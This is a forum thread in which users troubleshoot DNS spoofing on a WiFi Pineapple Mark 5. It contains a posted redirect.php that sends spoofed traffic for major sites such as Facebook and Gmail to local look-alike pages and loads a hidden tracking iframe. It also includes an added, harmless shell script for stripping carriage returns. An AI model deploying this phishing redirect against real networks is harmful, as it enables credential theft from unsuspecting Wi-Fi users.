SystemCrash86 Posted October 28, 2013
I got the new WiFi Pineapple Mark 5 and everything works great, except for the dnsspoof - it just doesn't work at all. Is this a common issue with the new Pineapple or is it just me, and is there a possible fix?

no42 Posted October 28, 2013
It should work! It's just that the default index.php file (that you're most likely hitting) is issuing a redirect to /redirect.php on the spoofed website, so www.example.com becomes www.example.com/redirect.php. Replace your /www/index.php with something static that you can easily identify, like pineapple_surprise?

SystemCrash86 Posted October 28, 2013
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "hotmail")){
    header('Status: 302 Found');
    header('Location: hotmail.htm');
}
if (strpos($ref, "facebook")){
    header('Status: 302 Found');
    header('Location: facebook.htm');
}
if (strpos($ref, "twitter")){
    header('Status: 302 Found');
    header('Location: twitter.htm');
}
if (strpos($ref, "gmail")){
    header('Status: 302 Found');
    header('Location: gmail.htm');
}
if (strpos($ref, "youtube")){
    header('Status: 302 Found');
    header('Location: youtube.htm');
}
if (strpos($ref, "vimeo")){
    header('Status: 302 Found');
    header('Location: vimeo.htm');
}
if (strpos($ref, "linkedin")){
    header('Status: 302 Found');
    header('Location: linkedin.htm');
}
if (strpos($ref, "instagram")){
    header('Status: 302 Found');
    header('Location: instagram.html');
}
if (strpos($ref, "plus.google")){
    header('Status: 302 Found');
    header('Location: googleplus.htm');
}
if (strpos($ref, "netflix")){
    header('Status: 302 Found');
    header('Location: netflix.htm');
}
if (strpos($ref, "ustream")){
    header('Status: 302 Found');
    header('Location: ustream.htm');
}
if (strpos($ref, "dropbox")){
    header('Status: 302 Found');
    header('Location: dropbox.htm');
}
if (strpos($ref, "blogger")){
    header('Status: 302 Found');
    header('Location: blogger.htm');
}
if (strpos($ref, "outlook")){
    header('Status: 302 Found');
    header('Location: outlook.htm');
}
require('error.php');
?>
<iframe style="display:none;" src="/get/get.php"></iframe>

This is my redirect.php - the only thing I changed; the error.php and the index.php remain untouched. It worked for my Mark 4 so I assumed it would work for my Mark 5 - was that an error on my part?

thesugarat Posted October 29, 2013
DNS Spoofing does work on the Mark 5. There are a few things you'll need to know though. The Configuration Tile: DNS Spoof Tab has a bug in it. If you use that Tab to edit the Hosts or the index.php, your files will end up with extra characters that look like this: ^M. There will be one after each line. If you SSH in and delete those out it will start working. The dnsspoof infusion does not add the extra characters but it does not support editing the index.php. Again, just SSH in.

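The ^M characters described in the post above are carriage returns (CRLF line endings), which many viewers do not display. The following is an added example, not part of the thread and not Hak5 code: a POSIX sh sketch that counts lines ending in a carriage return and strips them, keeping a backup. The function names and the sample file contents (192.0.2.1, example.com) are constructed for illustration; pass your own file paths as arguments.

```shell
#!/bin/sh
# Added example: find and strip carriage returns (displayed as ^M) from text files.
CR=$(printf '\r')

# Print the number of lines in FILE that end with a carriage return.
count_crlf() {
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 2; }
    grep -c "${CR}\$" "$1" || true   # grep exits 1 on zero matches; the count is still printed
}

# Remove trailing CRs from FILE in place, keeping FILE.bak and the file's permissions.
strip_crlf() {
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 2; }
    cp -p "$1" "$1.bak" &&
    sed "s/${CR}\$//" "$1.bak" > "$1"
}

# Report each FILE and fix the ones that have CRLF line endings.
fix_files() {
    for f in "$@"; do
        n=$(count_crlf "$f") || continue
        if [ "$n" -gt 0 ]; then
            echo "$f: $n line(s) end in CR, stripping"
            strip_crlf "$f"
        else
            echo "$f: clean"
        fi
    done
}

# Constructed sample: one hosts-style file saved with CRLF endings, one clean file.
demo() {
    d=$(mktemp -d) || return 1
    printf '192.0.2.1 example.com\r\n192.0.2.1 *.example.com\r\n' > "$d/spoofhost"
    printf '192.0.2.1 example.org\n' > "$d/clean"
    fix_files "$d/spoofhost" "$d/clean"
    cat -v "$d/spoofhost"   # cat -v would show ^M for any CR left behind
    rm -rf "$d"
}

demo
```

Plain `cat` or a web editor will not show the carriage returns; `cat -v` or the count from `count_crlf` will.
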
SystemCrash86 Posted October 29, 2013
I had a look at the Configuration Tile and DNS Spoof Tab and the Hosts or index.php have no extra characters at all - not even the ^M - and the same thing in the dnsspoof infusion. All I changed was my redirect.php, that's it, that's all I changed, and when I start dns spoof - either from the configuration tile or the actual dns spoof tile - I get no errors at all. On my other PC I browse to the spoofed site, e.g. facebook, twitter, and the actual site loads. I haven't seen any extra characters.

barry99705 Posted October 29, 2013
I've not been able to get dnsspoof to forward to another site, just to the internal server. Not sure what's the issue.

thesugarat Posted October 29, 2013
SystemCrash86, How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.

barry99705, I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

SystemCrash86 Posted October 29, 2013
> SystemCrash86, How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.
>
> barry99705, I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

I SSH'd into the Pineapple and went to the www folder and checked the index.php file and other files in that folder and still nothing - did I miss something?

thesugarat Posted October 29, 2013
Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file?

SystemCrash86 Posted October 29, 2013
> Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file?

After I couldn't find anything in the www folder I looked at the /etc/pineapple/spoofhost file and found nothing except the hosts I want to dnsspoof, no extra characters or anything. I'm very confused.

hfam Posted October 29, 2013
There is already an entire thread on this issue. Please search the forums before starting another thread: https://forums.hak5.org/index.php?/topic/30580-dns-spoof-not-spoofing-the-dnses/